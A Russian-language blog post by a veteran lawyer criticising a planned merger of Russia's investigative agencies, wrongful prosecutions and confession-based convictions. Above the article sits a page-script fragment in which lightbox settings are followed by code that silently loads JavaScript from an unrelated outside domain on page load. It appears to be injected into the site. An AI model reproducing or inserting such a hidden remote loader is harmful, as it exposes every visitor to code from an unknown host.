, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Реформирование следствие без анализа его работы очень характеризует реформаторов

23 Мар

СМИ сообщают о том, что Владимир Путин принял решение о реформировании Следственного комитета, на базе которого будет выстроена новая структура, объединяющая следствие всех ныне действующих органов — МВД, СК и ФСБ. Аналог американского ФБР https://pasmi.ru/archive/205727/?utm_referrer=https%3A%2F%2Fzen.yandex.com

Как окончивший в 1974 году Высшую следственную школу МВД СССР, насмотрелся разных реформ в этом ведомстве.  Все они были неудачными. Они не сделали главного — Человек, его права и свободы так и не стали высшей ценностью. Признание, соблюдение и защита прав и свобод человека и гражданина — не стали обязанность для служащих в МВД.

Обрядили сотрудников органов внутренних дел и следователей в новые мундиры, повысили оклады начальникам, но мер, обеспечивающих их работу по требованиям  Конституции и процессуальному закону, не приняли.

Отстранив прокуратуру от надзора за следствием, начали игнорировать волю народа, изложенную в Основном Законе страны.

Так статья 49 Конституции России предписывает:

1. Каждый обвиняемый в совершении преступления считается невиновным, пока его виновность не будет доказана в предусмотренном федеральным законом порядке и установлена вступившим в законную силу приговором суда.

2. Обвиняемый не обязан доказывать свою невиновность.

3. Неустранимые сомнения в виновности лица толкуются в пользу обвиняемого.

Порядок доказывания оказался кому-то хлопотным, поэтому доказывание виновности  переложить на того, кого назначили обвиняемым. У того, кто согласился с предъявленным обвинением, уже  не может быть никаких неустранимых сомнений в виновности.

Такое следствие сделало бесполезной работу адвокатов, осуществляющих защиту правовым путём. Востребованными стали адвокаты-решалы, что могли склонить обвиняемого к признанию вины либо получить мзду, и откупить от ответственности того, кто действительно совершил преступление.

Как юрист по образованию Путин не мог не знать, что признание обвиняемым своей вины в совершении преступления может быть положено в основу обвинения лишь при подтверждении его виновности совокупностью имеющихся по уголовному делу доказательств (ч. 2 ст. 77 УПК РФ).

Но подписанный http://rulaws.ru/laws/Federalnyy-zakon-ot-04.07.2003-N-92-FZ/          Путиным закон, позволяет не считаться с такой процедурой доказывания. Даже Сталин с Вышинским, считавшие «царицей» доказательств,  признание обвиняемым вины, не пытались узаконить это.  Путин узаконил.

Более того, кто-то из недоучившихся помощников  Путина убедил его  в том, что не надо наделять суд обязанностью перед заключением под стражу, проверять законность и обоснованность постановления следователя о привлечении в качестве обвиняемого.

Посчитали, что это предрешает вопрос о виновности обвиняемого, забыв о том, что статья 46 Конституции России каждому гарантирует судебную защиту его прав и свобод. А решения и действия (или бездействие) органов государственной власти, органов местного самоуправления, общественных объединений и должностных лиц могут быть обжалованы в суд.

Вот мы и получили страну, где по утверждению http://rapsinews.ru/incident_news/20140212/270699689.html#ixzz2t6WBNAjJ  Генерального прокурора Ю. Чайки, тысячи сидят не за что. А от себя, как практикующий 45 лет юрист, могу добавить, что сотни тысяч сидят не за то. Дело А. Костюхина, что  судьи дважды неправомерно осуждали на 15 лет лишения свободы,  доказывает это.

О масштабах криминальной деятельности в России свидетельствуют проводимые исследования. Так, ежегодно более 12 млн. обращений поступает и регистрируется  в правоохранительных органах о совершенных преступлениях. Но возбуждали не более 2 млн. уголовных дел. Из них более миллиона прекращают на предварительном следствии по различным основаниям, и до суда доходит около 900 тыс. уголовных дел.

В целом от исходной базы числа зарегистрированных сообщений о преступлениях «на выходе» остается лишь около 6% обвинительных решений, т.е. в 16−17 раз меньше http://rapsinews.ru/judicial_analyst/20141202/272697983.html

Проводимые исследования подтверждаются и утверждениями Генерального прокурора Ю. Чайки: «Всеми органами предварительного расследования закон нередко нарушается еще до возбуждения уголовного дела. Ежегодно прокуроры выявляют массу случаев, когда людям отказывают в приеме их заявлений о преступлениях при наличии бесспорных поводов и оснований для возбуждения уголовного дела. Отмененные прокурорами постановления об отказе в возбуждении уголовного дела исчисляются миллионами» https://rg.ru/2015/01/12/chaika.html

Таким образом, в стране  много лет создаётся обманчивая картина о криминальных проявлениях и борьбе с ними.  Назначение следствия по защите потерпевших от преступлений  исполняется в мизерных долях.

Прежде чем начать серьезные кадровые перестановки в центральном аппарате полиции, СК, ФСБ, надо всех должностных лиц этих ведомств пропустить, через требования п.п. 8 п. 2 ст. 235 ГК РФ,  избавившись от незаконно обогатившихся на своих должностях чиновников. Сразу получим ответ на вопрос:  Куда осели средства тех  500 000 предпринимателей, что обобрали, неправомерно возбудив уголовные дела?

Время показало, что за десять лет, при всём трудолюбии, порядочности и желании сделать следствие передовым, Александр Бастрыкин не способен  в данном ведомстве установить ведомственный контроль. Следствие, как вид деятельности деградировало.

Уверен, что не может быть начальником следственного подразделения тот, кто сам не окончил расследование по групповому уголовному делу. Работа «теоретиков» от следствия удручает. Она подрывает доверие ко всей правоохранительной деятельности.

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.